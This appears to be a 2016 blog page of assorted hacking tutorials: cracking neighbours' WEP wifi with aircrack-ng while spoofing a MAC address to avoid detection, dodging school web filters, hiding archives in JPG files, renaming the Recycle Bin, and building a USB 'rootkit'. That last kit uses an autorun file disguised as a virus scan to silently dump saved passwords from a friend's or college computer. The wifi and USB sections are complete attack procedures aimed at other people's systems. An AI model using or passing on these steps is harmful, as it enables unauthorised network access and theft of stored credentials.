Thursday, 25 August 2016

Hacking WEP wifi passwords

1. Getting the right tools
Download Backtrack 3. It can be found here:
http://www.remote-exploit.org/backtrack_download.html

The Backtrack 4 beta is out but until it is fully tested (especially if you are a noob) I would get the BT3 setup. The rest of this guide will proceed assuming you downloaded BT3. I downloaded the CD iso and burned it to a cd. Insert your BT3 cd/usb drive and reboot your computer into BT3. I always load into the 3rd boot option from the boot menu. (VESA/KDE) You only have a few seconds before it auto-boots into the 1st option so be ready. The 1st option boots too slowly or not at all so always boot from the 2nd or 3rd. Experiment to see what works best for you.

2. Preparing the victim network for attack
Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card. Type:
airmon-ng
You will see the name of your wireless card. (mine is named "ath0") From here on out, replace "ath0" with the name of your card. Now type:
airmon-ng stop ath0
then type:
ifconfig wifi0 down
then:
macchanger --mac 00:11:22:33:44:55 wifi0
then:
airmon-ng start wifi0
What these steps did was to spoof (fake) your mac address so that JUST IN CASE your computeris discovered by someone as you are breaking in, they will not see your REAL mac address. Moving on... Now it's time to discover some networks to break into.
Type:
airodump-ng ath0
Now you will see a list of wireless networks start to populate. Some will have a better signal than others and it is a good idea to pick one that has a decent signal otherwise it will take forever to crack or you may not be able to crack it at all. Once you see the network that you want to crack, do this:
hold down ctrl and tap c
This will stop airodump from populating networks and will freeze the screen so that you can see the info that you need.
**Now from here on out, when I tell you to type a command, you need to replace whatever is in parenthesis with what I tell you to from your screen. For example: if i say to type: -c (channel) then dont actually type in -c (channel) Instead, replace that with whatever the channel number is...so, for example you would type: -c 6 Can't be much clearer than that...lets continue...
Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.
Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this --> 05:gk:30:fo:s9:2n The Channel number will be under a heading that says "CH". Now, in the same Konsole window, type:
airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0
the FILE NAME can be whatever you want. This is simply the place that airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension...just pick a random word that you will remember. I usually make mine "wepkey" because I can always remember it.

**Side Note: if you crack more than one network in the same session, you must have different file names for each one or it won't work. I usually just name them wepkey1, wepkey2, etc.**

Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in noob terms all this means is "packets of info that contain clues to the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password.
I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password.
Now you are thinking, "I'm screwed because my IV's are going up really slowly." Well, don't worry, now we are going to trick the router into giving us HUNDREDS of IV's per second.

3. Actually cracking the WEP password
Now leave this Konsole window up and running and open up a 2nd Konsole window. In this one type:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0
This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean...just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds...sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.
Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password. Type:
aircrack-ng -b (bssid) (filename)-01.cap
Remember the filename you made up earlier? Mine was "wepkey". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap Once you have done this you will see aircrack fire up and begin to crack the password. typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000." DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.
If you do everything correctly up to this point, before too long you will have the password! now if the password looks goofy, dont worry, it will still work. some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.
Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as: se:cr:et This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FKW9427VF" then it would still display as: 0F:KW:94:27:VF Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!
It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.
I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network. :-)
I will gladly answer any legitimate questions anyone has to the best of my ability. HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY ANSWERED. No one wants to hold your hand through this...read the tut and go experiment until you get it right.
There are rare occasions where someone will use WEP encryption with SKA as well. (Shared Key Authentication) If this is the case, additional steps are needed to associate with the router and therefore, the steps I lined out here will not work. I've only seen this once or twice, though, so you probably won't run into it. If I get motivated, I may throw up a tut on how to crack this in the future.

How to bypass your school or college blocking sites

First of all you need to go onto:
http://g.ho.st/
This is a virtual machine/ computer that your sysadmins shouldn't have blocked. At my school, our security is pretty high because of people like me and you.

Ok, now you click on the big button that says: Start.

Now make an account, you should see the register button. I have made an account, (trust me, it is easy).

After you have logged in, you should see another screen.

After you have got logged in, you should try and get on the g.ho.st internet (alpha), to get on the internet, follow these commands.

on the desktop, click on the icon that says: find cool web stuff. Then click the icon that says: Web. Now go to: Ghost services. And there should be a icon that says: G.ho.st browser (alpha).

(If you go on a website, and it says: open in a new tab because this site will function better, (or something like that) don't do it. But if you want to, just do it).

How to hide files in a jpg

Set up:
1. Must have a .zip or .rar compressor.

Steps:
1. Save the picture of choice to your desktop.

2. Make a new .rar or .zip folder on your desktop.

3. Add the files you want to hide into the .zip or .rar

4. Click start menu, run, cmd.

5. In Command Prompt type cd "desktop" with the quotation marks.

6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg ( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg )

7. Now there should be the outputed file name with a .jpg extension on the desktop. ( Do not close Command Prompt just yet )

8. Double click it to open the picture and check it out.

9. When your done looking, and want to view the hidden files Type: ren outputfilename.jpg outputfilename.rar  or zip
Now you're done!
A quick info-fact: With this technique of hiding files in a jpg you can send this to anyone and they just have to rename the file extension to .zip or .rar.

How To Rename Your Recycle Bin

1. Click Start / Run.

2. Type regedit and press enter.

3. Open the HKEY_CLASSES_ROOT folder.

4. Open the CLSID folder.

5. Open the {645FF040-5081-101B-9F08-00AA002F954E} folder.

6. Open the ShellFolder folder

7. Change the "Attributes" data value from "40 01 00 20" to "50 01 00 20". Once completed change the "CallForAttributes" dword value to "0x00000000" (doubleclick and change value data to 0). You must change both of these values to get the rename to appear.
After performing the above steps you will be able to rename the icon like any other icon. Right-click the Recycle Bin icon on the desktop and click Rename and rename it to whatever you wish.

How to hack passwords using USB Drive

Today I will show you how to hack Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit:

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free. Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. -----------------------------------------------------------------------------------------------
Here is a step by step procedre to create the password hacking toolkit:
NOTE: You must temporarily disable your antivirus before following these steps....

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it: [autorun] open=launch.bat ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it: start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps...

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.